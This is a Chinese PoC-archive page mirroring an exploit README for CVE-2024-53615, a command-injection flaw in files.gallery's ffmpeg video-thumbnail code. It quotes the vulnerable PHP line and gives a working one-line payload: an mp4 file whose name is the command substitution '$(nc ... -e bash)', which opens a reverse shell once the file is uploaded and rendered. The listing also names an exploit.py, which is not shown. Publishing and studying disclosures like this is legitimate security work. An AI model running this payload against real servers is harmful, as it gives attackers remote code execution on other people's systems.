关联漏洞
标题:
N/A
(CVE-2024-53615)
描述:卡尔·沃德的files.gallery 从 v0.3.0 到 0.11.0 版本的视频缩略图渲染组件中存在命令注入漏洞,允许远程攻击者通过特制的视频文件执行任意代码。
描述
CVE-2024-53615
介绍
# CVE-2024-53615
`files.gallery` contains an RCE vulnerability. Prerequisites:
- `ffmpeg` in `PATH`
- `config.php`: `'allow_upload' => true`
- `exec` must be enabled in PHP config
The vulnerability is in the following line, which generates video previews:
```php
$cmd = $ffmpeg_path . ' -ss 3 -t 1 -hide_banner -i "' . str_replace('"', '\"', $this->path) . '" -frames:v 1 -an -vf "thumbnail,scale=480:320:force_original_aspect_ratio=increase,crop=480:320" -r 1 -y -f mjpeg "' . $cache . '" 2>&1';
```
As `$this->path` is user controllable, we can construct a malicious file whose title is a bash command substitution. It is important that this file must contain e.g., the mp4 magic bytes and the filename must end with `.mp4`:
```sh
$ echo "AAAAIGZ0eXBpc29tAAACAGlzb21pc28yYXZjMW1wNDEAAQv7bW9vdgAAAGxtdmhk" | base64 -d > '$(nc 127.0.0.1 8443 -e bash).mp4'
```
If we upload this file, and refresh the page to make the application load the file, we obtain a shell on our local machine.
Note: the command is stored in the filename, so reverse shell possibilities are limited due to name length constraints.
文件快照
[4.0K] /data/pocs/ad0103e8a0a069644be3a84634af226f17509757
├── [2.0K] exploit.py
└── [1.1K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。